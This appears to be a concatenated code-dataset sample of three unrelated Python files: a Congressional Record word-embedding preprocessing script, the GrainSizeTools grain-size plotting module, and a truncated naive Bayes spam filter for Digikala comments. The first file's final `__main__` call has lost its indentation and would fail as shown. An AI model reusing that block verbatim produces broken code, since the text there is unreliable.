            with open(underscored_path, 'r') as underscored_corpus:
                for line in underscored_corpus:
                    words = line.split()
                    if party == 'D':
                        D_freq.update(words)
                    else:
                        R_freq.update(words)
    word_to_id, _ = build_vocabulary(D_freq + R_freq, training_min_freq)
    output_path = output_dir / 'vocab_partisan_frequency.tsv'
    _export_sorted_frequency_by_party(
        D_freq, R_freq, word_to_id, output_path, sort_min_freq)
def balance_classes(socialism: List, capitalism: List) -> List:
    """Downsample the larger party so both contribute equally.

    Prints the pre-balance proportions, randomly samples the majority
    class down to the minority's size, and returns the Democratic
    examples followed by the Republican ones.
    """
    total = len(socialism) + len(capitalism)
    print(f'Pre-balanced Dem = {len(socialism):,}\t{len(socialism) / total:.2%}')
    print(f'Pre-balanced GOP = {len(capitalism):,}\t{len(capitalism) / total:.2%}')
    minority = min(len(capitalism), len(socialism))
    if len(capitalism) > len(socialism):
        capitalism = random.sample(capitalism, k=minority)
        print(f'Balancing training data by sampling GOP to {minority:,}.')
    else:
        socialism = random.sample(socialism, k=minority)
        print(f'Balancing training data by sampling Dem to {minority:,}.')
    return socialism + capitalism
def faux_sent_tokenize(
        tokens: List,
        fixed_sent_len: int,
        min_sent_len: int
) -> Iterable[List[str]]:
    """Partition a document into consecutive fixed-length faux sentences.

    Yields chunks of exactly *fixed_sent_len* tokens; the trailing
    partial chunk is yielded only if it holds at least *min_sent_len*
    tokens, otherwise it is discarded.

    BUG FIX: the original sliced the tail with ``tokens[start:-1]`` (and
    bounded the loop with ``len(tokens) - 1``), which unconditionally
    dropped the final token of every document.
    """
    start_index = 0
    while start_index + fixed_sent_len <= len(tokens):
        yield tokens[start_index:start_index + fixed_sent_len]
        start_index += fixed_sent_len
    trailing_words = tokens[start_index:]
    if len(trailing_words) >= min_sent_len:
        yield trailing_words
def main(
        sessions: Iterable[int],
        in_dir: Path,
        out_dir: Path,
        subsampling_implementation: Optional[str],
        subsampling_threshold: float,
        min_word_freq: int,
        min_sent_len: int,
        fixed_sent_len: int,
        eval_min_freq: int,
        eval_R_thresholds: Iterable[float],
        eval_num_random_samples: int,
        conserve_RAM: bool
) -> None:
    """Run the proxy-grounded preprocessing pipeline for the CR corpus.

    Loads per-session, per-party underscored text from *in_dir*, maps
    rare words to [UNK], subsamples frequent words, chops documents into
    fixed-length faux sentences, numericalizes them, writes evaluation
    word lists, and pickles everything to *out_dir*/train.pickle.  A
    human-readable summary goes to *out_dir*/preview.txt.
    """
    Path.mkdir(out_dir, parents=True, exist_ok=True)
    preview = open(out_dir / f'preview.txt', 'w')
    # Echo the run configuration both to stdout and to the preview file.
    print(f'Reading sessions {sessions}. Writing to {out_dir}')
    print(f'Reading sessions {sessions}. Writing to {out_dir}', file=preview)
    print(f'Min word frequency = {min_word_freq}', file=preview)
    print(f'Min sentence length = {min_sent_len}', file=preview)
    print(f'Faux sentence fixed length = {fixed_sent_len}', file=preview)
    print(f'SGNS subsample implementation= {subsampling_implementation}', file=preview)
    print(f'SGNS subsample threshold = {subsampling_threshold}', file=preview)
    # One LabeledDoc per input line; party is the connotation label.
    corpus: List[LabeledDoc] = []
    norm_freq: Counter[str] = Counter()
    for session in tqdm(
            sessions,
            desc='Loading multi-word expression underscored pickles...'):
        for party in ('D', 'R'):
            in_path = in_dir / f'underscored_{party}{session}.txt'
            with open(in_path) as underscored_corpus:
                for line in underscored_corpus:
                    underscored_tokens = line.split()
                    norm_freq.update(underscored_tokens)
                    corpus.append(LabeledDoc(
                        uid=None,
                        title=None,
                        url=None,
                        party=party,
                        referent=None,
                        text=underscored_tokens,
                        date=None,
                        sentences=[]))
    cumulative_freq = sum(freq for freq in norm_freq.values())
    print(f'Noramlized vocabulary size = {len(norm_freq):,}', file=preview)
    print(f'Number of words = {cumulative_freq:,}', file=preview)
    # Filter counter with MIN_FREQ and count UNK: words below the
    # threshold have their counts folded into a single '[UNK]' entry.
    UNK_filtered_freq: Counter[str] = Counter()
    for key, val in norm_freq.items():
        if val >= min_word_freq:
            UNK_filtered_freq[key] = val
        else:
            UNK_filtered_freq['[UNK]'] += val
    print(f'Filtered vocabulary size = {len(UNK_filtered_freq):,}', file=preview)
    # Sanity check: folding into [UNK] must preserve the total count.
    assert sum(freq for freq in norm_freq.values()) == cumulative_freq
    # Subsampling & filter by min/max sentence length
    keep_prob = subsampling(
        UNK_filtered_freq, subsampling_implementation, subsampling_threshold)
    # ground maps each surviving word to its per-party occurrence counts.
    ground: Dict[str, GroundedWord] = {}
    final_freq: Counter[str] = Counter()
    for doc in tqdm(corpus, desc='Subsampling frequent words'):
        subsampled_words = []
        for token in doc.text:
            # 'discard' is the module-level stopword + procedural-word set.
            if token in discard:
                continue
            if token not in UNK_filtered_freq:
                token = '[UNK]'
            # Keep the token with the heuristic's probability.
            if random.random() < keep_prob[token]:
                subsampled_words.append(token)
        for faux_sent in faux_sent_tokenize(
                subsampled_words, fixed_sent_len, min_sent_len):
            final_freq.update(faux_sent)
            doc.sentences.append(Sentence(subsampled_tokens=faux_sent))
            for word in faux_sent:
                if word not in ground:
                    ground[word] = GroundedWord(
                        text=word, deno=None, cono=Counter({doc.party: 1}))
                else:
                    ground[word].cono[doc.party] += 1
        if conserve_RAM:
            # Raw token list no longer needed once sentences are built.
            doc.text = None
    # End looping documents
    print(f'Final vocabulary size = {len(final_freq):,}', file=preview)
    print(f'Subsampled number of words = '
          f'{sum(freq for freq in final_freq.values()):,}', file=preview)
    # Filter out empty documents
    corpus = [doc for doc in corpus if len(doc.sentences) > 0]
    # Numericalize corpus by word_ids
    word_to_id, id_to_word = build_vocabulary(final_freq)
    for doc in tqdm(corpus, desc='Converting to word ids'):
        for sent in doc.sentences:
            sent.numerical_tokens = [
                word_to_id[token] for token in sent.subsampled_tokens]
            if conserve_RAM:
                sent.subsampled_tokens = None
    # Prepare grounding for intrinsic evaluation: cache each word's
    # majority party, total frequency, and Republican ratio.
    random_eval_words = set()
    for gw in ground.values():
        gw.majority_cono = gw.cono.most_common(1)[0][0]
        gw.freq = sum(gw.cono.values())
        gw.R_ratio = gw.cono['R'] / gw.freq
        if gw.freq >= eval_min_freq:
            random_eval_words.add(gw.text)
    # NOTE(review): random.sample on a set is deprecated in 3.9 and a
    # TypeError on Python >= 3.11 — convert to a sorted list first.
    random_eval_words = random.sample(random_eval_words, eval_num_random_samples)
    with open(out_dir / f'eval_words_random.txt', 'w') as file:
        file.write('\n'.join(random_eval_words))
    # For each R_ratio threshold, export the partisan word lists and a
    # dev/test split of (at most 2 * eval_num_random_samples) samples.
    for R_threshold in eval_R_thresholds:
        D_threshold = 1 - R_threshold
        partisan_eval_words = []
        for gw in ground.values():
            if gw.freq >= eval_min_freq:
                if gw.R_ratio >= R_threshold or gw.R_ratio <= D_threshold:
                    partisan_eval_words.append(gw)
        print(f'{len(partisan_eval_words)} partisan eval words '
              f'with R_threshold = {R_threshold}', file=preview)
        out_path = out_dir / f'inspect_{R_threshold}_partisan.tsv'
        with open(out_path, 'w') as file:
            print('word\tfreq\tR_ratio', file=file)
            for gw in partisan_eval_words:
                print(gw.text, gw.freq, gw.R_ratio, sep='\t', file=file)
        if len(partisan_eval_words) > 2 * eval_num_random_samples:
            partisan_eval_words = random.sample(
                partisan_eval_words, 2 * eval_num_random_samples)
        else:
            random.shuffle(partisan_eval_words)
        mid = len(partisan_eval_words) // 2
        with open(out_dir / f'{R_threshold}partisan_dev_words.txt', 'w') as file:
            for gw in partisan_eval_words[:mid]:
                print(gw.text, file=file)
        with open(out_dir / f'{R_threshold}partisan_test_words.txt', 'w') as file:
            for gw in partisan_eval_words[mid:]:
                print(gw.text, file=file)
    # Helper for negative sampling: unigram distribution raised to 3/4,
    # as in word2vec, then flattened into a list indexed by word id.
    cumulative_freq = sum(freq ** 0.75 for freq in final_freq.values())
    negative_sampling_probs: Dict[int, float] = {
        word_to_id[word]: (freq ** 0.75) / cumulative_freq
        for word, freq in final_freq.items()}
    vocab_size = len(word_to_id)
    negative_sampling_probs: List[float] = [
        # negative_sampling_probs[word_id]  # strict
        negative_sampling_probs.get(word_id, 0)  # prob = 0 if missing vocab
        for word_id in range(vocab_size)]
    random.shuffle(corpus)
    cucumbers = {
        'word_to_id': word_to_id,
        'id_to_word': id_to_word,
        'ground': ground,
        'negative_sampling_probs': negative_sampling_probs,
        'documents': corpus}
    print(f'Writing to {out_dir}')
    with open(out_dir / 'train.pickle', 'wb') as out_file:
        pickle.dump(cucumbers, out_file, protocol=-1)
    # Print out vocabulary & some random sentences for sanity check
    docs = random.sample(corpus, 100)
    preview.write('\n')
    for doc in docs:
        sent = doc.sentences[0]
        if not conserve_RAM:
            # print(sent.tokens, file=preview)
            # print(sent.normalized_tokens, file=preview)
            print(sent.subsampled_tokens, file=preview)
            print(sent.numerical_tokens, file=preview, end='\n\n')
        else:
            print(sent.numerical_tokens, file=preview)
            # print(vars(doc), end='\n\n', file=preview)
    preview.write('\n\nfinal_freq\tword\n')
    for key, val in final_freq.most_common():
        print(f'{val:,}\t{ground[key]}', file=preview)
    preview.close()
    print('All set!')
# preview_path = out_dir / 'preview.txt'
# with open(preview_path, 'w') as preview:
# preview.write(f'final vocabulary size = {len(word_to_id):,}\n')
# # preview.write(f'total number of words = {num_words_exported:,}\n')
# preview.write(f'subsampling implementation = {subsampling_implementation}\n')
# preview.write(f'subsampling threshold = {subsampling_threshold}\n')
# preview.write(f'minimum word frequency = {min_word_freq}\n')
# preview.write(f'\nPreview:\n')
# for speech in export_docs[:100]:
# words = map(id_to_word.get, speech[1]) # type: ignore
# preview.write(' '.join(words) + '\n')
# export_sorted_frequency(
# raw_frequency, combined_frequency, min_word_freq,
# out_dir / 'vocabulary_subsampled_frequency.txt')
# export_sampled_frequency_by_party(
# D_raw_freq, R_raw_freq, D_final_freq, R_final_freq, word_to_id,
# out_dir / 'vocabulary_partisan_frequency')
# random.shuffle(export_docs)
# corpus = [doc for _, doc in export_docs]
# labels = [label for label, _ in export_docs]
# grounding: Dict[str, Dict] = {}
# for word in word_to_id.keys():
# df = D_raw_freq[word]
# rf = R_raw_freq[word]
# grounding[word] = {
# 'D': df,
# 'R': rf,
# 'R_ratio': rf / (df + rf)}
# cucumbers = {
# 'word_to_id': word_to_id,
# 'id_to_word': id_to_word,
# 'grounding': grounding,
# 'negative_sampling_probs': negative_sampling_probs,
# 'documents': documents,
# 'cono_labels': labels}
# train_data_path = out_dir / f'train_data.pickle'
# with open(train_data_path, 'wb') as export_file:
# pickle.dump(cucumbers, export_file, protocol=-1)
# print('All set.')
if __name__ == '__main__':
main(
sessions=range(97, 112),
in_dir=Path('../../data/interim/underscored_corpora'),
out_dir=Path(f'../../data/ready/CR_proxy'),
subsampling_implementation='paper',
subsampling_threshold=1e-5,
min_word_freq=15,
min_sent_len=5,
fixed_sent_len=20,
eval_min_freq=100,
eval_R_thresholds=(0.6, 0.7, 0.75, 0.8, 0.9),
eval_num_random_samples=500,
conserve_RAM=True
)
| StarcoderdataPython |
3366507 | <reponame>jwestraadt/GrainSizeTools
# ============================================================================ #
# #
# This is part of the "GrainSizeTools Script" #
# A Python script for characterizing grain size from thin sections #
# #
# Copyright (c) 2014-present <NAME> #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# #
# Version 3.0.2 #
# For details see: http://marcoalopez.github.io/GrainSizeTools/ #
# download at https://github.com/marcoalopez/GrainSizeTools/releases #
# #
# ============================================================================ #
# ============================================================================ #
# Functions to generate the plots using the Python matplotlib library. #
# It uses hex color codes to set colors. #
# Save this file in the same directory as GrainSizeTools #
# ============================================================================ #
# import Python scientific modules
import matplotlib.pyplot as plt
import numpy as np
from scipy.stats import norm, gaussian_kde, shapiro, iqr
# plotting functions
def distribution(data,
                 plot=('hist', 'kde'),
                 avg=('amean', 'gmean', 'median', 'mode'),
                 binsize='auto',
                 bandwidth='silverman',
                 **fig_kw):
    """ Return a plot with the distribution of (apparent or actual) grain sizes
    in a dataset.

    Parameters
    ----------
    data : array_like
        the size of the grains

    plot : string, tuple or list; optional
        the type of plot, either histogram ('hist'), kernel density estimate
        ('kde') or both ('hist', 'kde'). Default is both.

    avg : string, tuple or list; optional
        the central tendency measures to show, either the arithmetic ('amean')
        or geometric ('gmean') means, the median ('median'), and/or the
        KDE-based mode ('mode'). Default all averages.

    binsize : string or positive scalar; optional
        If 'auto', it defines the plug-in method to calculate the bin size.
        When integer or float, it directly specifies the bin size.
        Default: the 'auto' method.

        | Available plug-in methods:
        | 'auto' (fd if sample_size > 1000 or Sturges otherwise)
        | 'doane' (Doane's rule)
        | 'fd' (Freedman-Diaconis rule)
        | 'rice' (Rice's rule)
        | 'scott' (Scott rule)
        | 'sqrt' (square-root rule)
        | 'sturges' (Sturge's rule)

    bandwidth : string {'silverman' or 'scott'} or positive scalar; optional
        the method to estimate the bandwidth or a scalar directly defining the
        bandwidth. It uses the Silverman plug-in method by default.

    **fig_kw :
        additional keyword arguments to control the size (figsize) and
        resolution (dpi) of the plot. Default figsize is (6.4, 4.8).
        Default resolution is 100 dpi.

    Call functions
    --------------
    - gaussian_kde (from Scipy stats)

    Examples
    --------
    >>> distribution(data['diameters'])
    >>> distribution(data['diameters'], figsize=(6.4, 4.8))

    Returns
    -------
    A plot showing the distribution of (apparent) grain sizes and
    the location of the averages defined.
    """

    fig, ax = plt.subplots(**fig_kw)

    if 'hist' in plot:
        # a scalar binsize is a bin *width*: convert it to the equivalent
        # number of equal-width bins over the data range for ax.hist
        if isinstance(binsize, (int, float)):
            binsize = int(np.ceil((data.max() - data.min()) / binsize))

        y_values, bins, __ = ax.hist(data,
                                     bins=binsize,
                                     range=(data.min(), data.max()),
                                     density=True,
                                     color='#80419d',
                                     edgecolor='#C59fd7',
                                     alpha=0.7)

        print('=======================================')
        print('Number of classes = ', len(bins) - 1)
        print('binsize = ', round(bins[1] - bins[0], 2))
        print('=======================================')

    if 'kde' in plot:
        # estimate kde first
        if isinstance(bandwidth, (int, float)):
            # gaussian_kde takes the bandwidth as a multiple of the sample
            # std dev, so an absolute bandwidth must be rescaled
            fixed_bw = bandwidth / np.std(data, ddof=1)
            kde = gaussian_kde(data, bw_method=fixed_bw)
        elif isinstance(bandwidth, str):
            kde = gaussian_kde(data, bw_method=bandwidth)
            # recover the actual (absolute) bandwidth used, for reporting
            bandwidth = round(kde.covariance_factor() * data.std(ddof=1), 2)
        else:
            raise ValueError("bandwidth must be integer, float, or plug-in methods 'silverman' or 'scott'")

        x_values = np.linspace(data.min(), data.max(), num=1000)
        y_values = kde(x_values)  # note: replaces the histogram heights

        print('=======================================')
        print('KDE bandwidth = ', round(bandwidth, 2))
        print('=======================================')

        if 'hist' in plot:
            ax.plot(x_values, y_values,
                    color='#2F4858')
        else:
            ax.plot(x_values, y_values,
                    color='#2F4858')
            ax.fill_between(x_values, y_values,
                            color='#80419d',
                            alpha=0.65)

    # plot the location of the averages
    # NOTE(review): y_values only exists if 'hist' or 'kde' was plotted;
    # calling with plot=() and any avg would raise a NameError — confirm
    # whether that input is ever expected.
    if 'amean' in avg:
        amean = np.mean(data)
        ax.vlines(amean, 0, np.max(y_values),
                  linestyle='solid',
                  color='#2F4858',
                  label='arith. mean',
                  linewidth=2.5)

    if 'gmean' in avg:
        gmean = np.exp(np.mean(np.log(data)))
        ax.vlines(gmean, 0, np.max(y_values),
                  linestyle='solid',
                  color='#fec44f',
                  label='geo. mean')

    if 'median' in avg:
        median = np.median(data)
        ax.vlines(median, 0, np.max(y_values),
                  linestyle='dashed',
                  color='#2F4858',
                  label='median',
                  linewidth=2.5)

    # the mode is derived from the KDE curve, hence the extra 'kde' requirement
    if 'mode' in avg and 'kde' in plot:
        mode = x_values[np.argmax(y_values)]
        ax.vlines(mode, 0, np.max(y_values),
                  linestyle='dotted',
                  color='#2F4858',
                  label='mode',
                  linewidth=2.5)

    ax.set_ylabel('density', color='#252525')
    ax.set_xlabel(r'apparent diameter ($\mu m$)', color='#252525')
    ax.legend(loc='best', fontsize=16)
    # ax.set_ylim(bottom=-0.001)

    fig.tight_layout()

    return fig, ax
def area_weighted(diameters, areas, binsize='auto', **fig_kw):
    """ Generate an area-weighted histogram and print different
    area-weighted statistics.

    Parameters
    ----------
    diameters : array_like
        the size of the grains

    areas : array_like
        the sectional areas of the grains

    binsize : string or positive scalar, optional
        If 'auto', it defines the plug-in method to calculate the bin size.
        When integer or float, it directly specifies the bin size.
        Default: the 'auto' method.

        | Available plug-in methods:
        | 'auto' (fd if sample_size > 1000 or Sturges otherwise)
        | 'doane' (Doane's rule)
        | 'fd' (Freedman-Diaconis rule)
        | 'rice' (Rice's rule)
        | 'scott' (Scott rule)
        | 'sqrt' (square-root rule)
        | 'sturges' (Sturge's rule)

    **fig_kw :
        additional keyword arguments to control the size (figsize) and
        resolution (dpi) of the plot. Default figsize is (6.4, 4.8).
        Default resolution is 100 dpi.

    Examples
    --------
    >>> area_weighted(data['diameters'], data['Areas'])
    >>> area_weighted(data['diameters'], data['Areas'], binsize='doane', dpi=300)

    Returns
    -------
    The matplotlib figure and axes of the area-weighted histogram.
    """
    # estimate the area-weighted mean grain size
    area_total = np.sum(areas)
    weighted_areas = areas / area_total
    weighted_mean = np.sum(diameters * weighted_areas)

    # estimate the bin edges (and the bin size h)
    if type(binsize) is str:
        histogram, bin_edges = np.histogram(diameters, bins=binsize, range=(0.0, diameters.max()))
        h = bin_edges[1]
    else:
        bin_edges = np.arange(0.0, diameters.max() + binsize, binsize)
        h = binsize

    # estimate the cumulative areas of each grain size interval.
    # FIX: the previous manual loop iterated over *all* edges (one interval
    # too many) with strictly half-open masks, so the largest grain always
    # fell into a spurious extra bin beyond the data range. np.histogram
    # uses the same half-open bins but makes the last one right-inclusive.
    cumulativeAreas, _ = np.histogram(diameters, bins=bin_edges, weights=areas)
    cumulativeAreas = np.round(cumulativeAreas, 1)

    # get the index of the modal interval
    getIndex = np.argmax(cumulativeAreas)

    print('=======================================')
    print('DESCRIPTIVE STATISTICS')
    print(f'Area-weighted mean grain size = {weighted_mean:0.2f} microns')
    print('=======================================')
    print('HISTOGRAM FEATURES')
    print(f'The modal interval is {bin_edges[getIndex]:0.2f} - {bin_edges[getIndex] + h:0.2f} microns')
    if type(binsize) is str:
        print(f'The number of classes are {len(histogram)}')
        print(f'The bin size is {h:0.2f} according to the {binsize} rule')
    print('=======================================')

    # normalize the y-axis values to percentage of the total area
    totalArea = sum(cumulativeAreas)
    cumulativeAreasNorm = [(x / float(totalArea)) * 100 for x in cumulativeAreas]
    maxValue = max(cumulativeAreasNorm)

    # make plot
    fig, ax = plt.subplots(**fig_kw)

    # figure aesthetics; bars are anchored on the *left* edge of each interval
    ax.bar(bin_edges[:-1], cumulativeAreasNorm, width=h,
           color='#55A868',
           edgecolor='#FEFFFF',
           align='edge',
           alpha=1)
    ax.vlines(weighted_mean, ymin=0, ymax=maxValue,
              linestyle='--',
              color='#1F1F1F',
              label='area weighted mean',
              linewidth=2)
    ax.set_ylabel('normalized area fraction (%)', color='#252525')
    ax.set_xlabel(r'apparent diameter ($\mu m$)', color='#252525')
    ax.legend(loc='best', fontsize=15)

    fig.tight_layout()

    return fig, ax
def normalized(data, avg='amean', bandwidth='silverman', **fig_kw):
    """Plot a log-transformed, normalized distribution of the grain
    population. Useful to compare grain size distributions between samples
    with different average values.

    Parameters
    ----------
    data : array-like
        the dataset

    avg : str, optional
        the normalization factor, either 'amean' or 'median'.
        Default: 'amean'

    bandwidth : str or scalar, optional
        the bandwidth of the KDE, by default 'silverman'

    **fig_kw :
        additional keyword arguments to control the size (figsize) and
        resolution (dpi) of the plot. Default figsize is (6.4, 4.8).
        Default resolution is 100 dpi.
    """
    log_sizes = np.log(data)
    arith_mean = np.mean(log_sizes)
    med = np.median(log_sizes)

    # pick the normalization factor and rescale the log-transformed data
    if avg == 'amean':
        scale = arith_mean
    elif avg == 'median':
        scale = med
    else:
        raise ValueError("Normalization factor has to be defined as 'amean' or 'median'")
    scaled = log_sizes / scale

    # estimate the KDE of the normalized values
    if isinstance(bandwidth, (int, float)):
        # gaussian_kde takes the bandwidth relative to the sample std dev
        kde = gaussian_kde(scaled, bw_method=bandwidth / np.std(scaled, ddof=1))
    elif isinstance(bandwidth, str):
        kde = gaussian_kde(scaled, bw_method=bandwidth)
        bandwidth = round(kde.covariance_factor() * scaled.std(ddof=1), 2)
    else:
        raise ValueError("bandwidth must be integer, float, or plug-in methods 'silverman' or 'scott'")

    grid = np.linspace(scaled.min(), scaled.max(), num=1000)
    density = kde(grid)

    # report the spread of the normalized distribution and the bandwidth used
    print('=======================================')
    if avg == 'amean':
        print(f'Normalized SD = {np.std(scaled):0.3f}')
    if avg == 'median':
        print(f'Normalized IQR = {iqr(scaled):0.3f}')
    print('KDE bandwidth = ', round(bandwidth, 2))
    print('=======================================')

    # make plot
    fig, ax = plt.subplots(**fig_kw)

    ax.plot(grid, density,
            color='#2F4858')
    ax.fill_between(grid, density,
                    color='#d1346b',
                    alpha=0.5)

    peak = np.max(density)
    ax.vlines(arith_mean / scale, 0, peak,
              linestyle='solid',
              color='#2F4858',
              label='arith. mean',
              linewidth=2.5)
    ax.vlines(med / scale, 0, peak,
              linestyle='dashed',
              color='#2F4858',
              label='median',
              linewidth=2.5)

    ax.set_ylabel('density', color='#252525')
    if avg == 'amean':
        ax.set_xlabel(r'normalized log grain size ($y / \bar{y}$)', color='#252525')
    else:
        ax.set_xlabel(r'normalized log grain size ($y / med_{y}$)', color='#252525')
    ax.legend(loc='best', fontsize=15)

    fig.tight_layout()

    return fig, ax
def qq_plot(data, percent=2, **fig_kw):
    """ Test whether the underlying distribution follows a lognormal
    distribution using a quantile-quantile (q-q) plot and a Shapiro-
    Wilk test.

    Parameters
    ----------
    data : array-like
        the apparent diameters or any other type of data

    percent : scalar between 0 and 100
        the percentile interval to estimate, default is 2 %

    Call functions
    --------------
    shapiro from scipy's stats
    """
    log_data = np.sort(np.log(data))

    # percentiles of the observed (log-transformed) data
    probs = np.arange(1, 100, percent)
    observed = np.percentile(log_data, probs)

    # matching percentiles of a normal distribution fitted to the data
    mu, sigma = np.mean(log_data), np.std(log_data)
    expected = norm.ppf(probs / 100, loc=mu, scale=sigma)
    lo, hi = expected.min(), expected.max()

    # make the plot
    fig, ax = plt.subplots(**fig_kw)

    # reference line: a perfectly lognormal sample falls on the identity
    ax.plot([lo, hi], [lo, hi],
            '-',
            color='#2F4858',
            label='perfect lognormal')
    ax.plot(expected, observed,
            'o',
            color='C0',
            alpha=0.5)
    ax.spines['right'].set_visible(False)
    ax.spines['top'].set_visible(False)
    ax.set_xlabel('theoretical', color='#252525')
    ax.set_ylabel('observed', color='#252525')
    ax.legend(loc='best', fontsize=18)
    # ax.set_aspect('equal')

    fig.tight_layout()

    # Shapiro-Wilk test; larger samples are randomly subsampled to 250 values
    if len(log_data) > 250:
        W, p_value = shapiro(np.random.choice(log_data, size=250))
    else:
        W, p_value = shapiro(log_data)

    print('=======================================')
    print('Shapiro-Wilk test (lognormal):')
    print(f'{W:0.2f}, {p_value:0.2f} (test statistic, p-value)')
    if p_value >= 0.05:
        print('It looks like a lognormal distribution')
        print('(⌐■_■)')
    else:
        print('It doesnt look like a lognormal distribution (p-value < 0.05)')
        print('(╯°□°)╯︵ ┻━┻')
    print('=======================================')

    return fig, ax
# Announce the import when this file is loaded as a module rather than run.
if __name__ != '__main__':
    print('module plot imported')
| StarcoderdataPython |
61598 | <filename>DigikalaCommentVerification/prepare.py
import pandas
import re
# stop words: common Persian words judged too generic to help classification
USELESS_WORDS = ['از', 'با', 'که', 'تا', 'در', 'اگر', 'اگه', 'یه', 'به', 'دیجی', 'دیجیکالا', 'خیلی', 'خریدم', 'عالی']
NUM_OF_TRAIN_COMMENTS = 180000  # NOTE(review): not referenced below — confirm it is needed
NUM_OF_TEST_COMMENTS = 18000    # NOTE(review): not referenced below — confirm it is needed

# labeled training comments, indexed by their id column
train_comments = pandas.read_csv('Files/train.csv', index_col='id')
# concat title and comment into new column
train_comments['full_comment'] = train_comments['title'] + ' ' + train_comments['comment']
train_comments['full_comment'] = train_comments['full_comment'].astype(str)
train_comments = train_comments.drop(columns=['rate'])

# unlabeled test comments, prepared the same way
test_comments = pandas.read_csv('Files/test.csv', index_col='id')
# concat title and comment into new column
test_comments['full_comment'] = test_comments['title'] + ' ' + test_comments['comment']
test_comments['full_comment'] = test_comments['full_comment'].astype(str)
test_comments = test_comments.drop(columns=['rate'])
# placeholder label, overwritten by the classifier loop below
test_comments['verification_status'] = 0

# verification_status == 1 is treated as "spam", 0 as "ham" throughout
spam_comments = train_comments[train_comments.verification_status == 1]
ham_comments = train_comments[train_comments.verification_status == 0]
num_of_spam_train = len(spam_comments)
num_of_ham_train = len(ham_comments)

# class priors for the naive Bayes classifier:
# probability if a comment is ham
probability_of_being_ham = num_of_ham_train / len(train_comments)
# probability if a comment is spam
probability_of_being_spam = num_of_spam_train / len(train_comments)

# word -> occurrence counts: overall, ham-only and spam-only vocabularies
word_dictionary = dict()
ham_word_dictionary = dict()
spam_word_dictionary = dict()
# not unique words in spam comments
num_of_words_in_spam_comments = 0
# not unique words in ham comments
num_of_words_in_ham_comments = 0
# Training pass: count word occurrences per class over the training comments.
for index, row in train_comments.iterrows():
    print(index)  # progress indicator
    # treat punctuation (Latin and Persian) as word separators
    row['full_comment'] = re.sub(r'[.|?,،!؟]', ' ', row['full_comment'])
    full_comment = row['full_comment'].split()
    for word in full_comment:
        # Take out emails, urls and numbers from words
        if re.match(r'^[-+]?[0-9]+$', word) or re.match(r'https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', word) or re.match(
                r'(?:[a-z0-9!#$%&\'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&\'*+/=?^_`{'
                r'|}~-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\['
                r'\x01-\x09\x0b\x0c\x0e-\x7f])*")@(?:(?:[a-z0-9](?:[a-z0-9-]*['
                r'a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:25[0-5]|2[0-4]['
                r'0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9]['
                r'0-9]?|[a-z0-9-]*[a-z0-9]:(?:['
                r'\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\['
                r'\x01-\x09\x0b\x0c\x0e-\x7f])+)\])', word) or re.match(r'[.!?\\-]', word) or (word in USELESS_WORDS):
            continue
        # number of occurrences of each word in ham comments
        else:
            if row.verification_status == 0:
                ham_word_dictionary[word] = ham_word_dictionary.get(word, 0) + 1
                num_of_words_in_ham_comments += 1
            else:
                spam_word_dictionary[word] = spam_word_dictionary.get(word, 0) + 1
                num_of_words_in_spam_comments += 1
            word_dictionary[word] = word_dictionary.get(word, 0) + 1

# unique words or V (vocabulary size, used for Laplace smoothing below)
num_of_unique_words_in_train_comments = len(word_dictionary.keys())
# Classification pass: score each test comment with naive Bayes and pick the
# more likely class.
for index, row in test_comments.iterrows():
    print(index)  # progress indicator
    row['full_comment'] = re.sub(r'[.|?,،!؟]', ' ', row['full_comment'])
    full_comment = row['full_comment'].split()
    # start from the class priors and multiply in per-word likelihoods
    ham_probability = probability_of_being_ham
    spam_probability = probability_of_being_spam
    for word in full_comment:
        # Take out emails, urls and numbers from words
        if re.match(r'^[-+]?[0-9]+$', word) or re.match(r'https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', word) or re.match(
                r'(?:[a-z0-9!#$%&\'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&\'*+/=?^_`{'
                r'|}~-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\['
                r'\x01-\x09\x0b\x0c\x0e-\x7f])*")@(?:(?:[a-z0-9](?:[a-z0-9-]*['
                r'a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:25[0-5]|2[0-4]['
                r'0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9]['
                r'0-9]?|[a-z0-9-]*[a-z0-9]:(?:['
                r'\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\['
                r'\x01-\x09\x0b\x0c\x0e-\x7f])+)\])', word) or re.match(r'[.!?\\-]', word) or (word in USELESS_WORDS):
            continue
        # number of occurrences of each word in ham comments
        else:
            # skip out-of-vocabulary words entirely
            if word_dictionary.get(word, 0) == 0:
                continue
            else:
                # Laplace (add-one) smoothed conditional probabilities
                ham_probability *= ((ham_word_dictionary.get(word, 0) + 1) / (
                        num_of_words_in_ham_comments + num_of_unique_words_in_train_comments))
                spam_probability *= ((spam_word_dictionary.get(word, 0) + 1) / (
                        num_of_words_in_spam_comments + num_of_unique_words_in_train_comments))
    # ties go to spam (the else branch)
    if ham_probability > spam_probability:
        test_comments.loc[index, 'verification_status'] = 0
    else:
        test_comments.loc[index, 'verification_status'] = 1
# Keep only the predicted labels (plus the id index) for the answer file.
# FIX: positional `axis` argument to DataFrame.drop is deprecated and was
# removed in pandas 2.0 — use the explicit `columns=` keyword instead.
test_comments = test_comments.drop(columns=['title', 'comment', 'full_comment'])
# NOTE(review): hardcoded absolute, machine-specific output path — consider
# making this relative or configurable.
test_comments.to_csv(
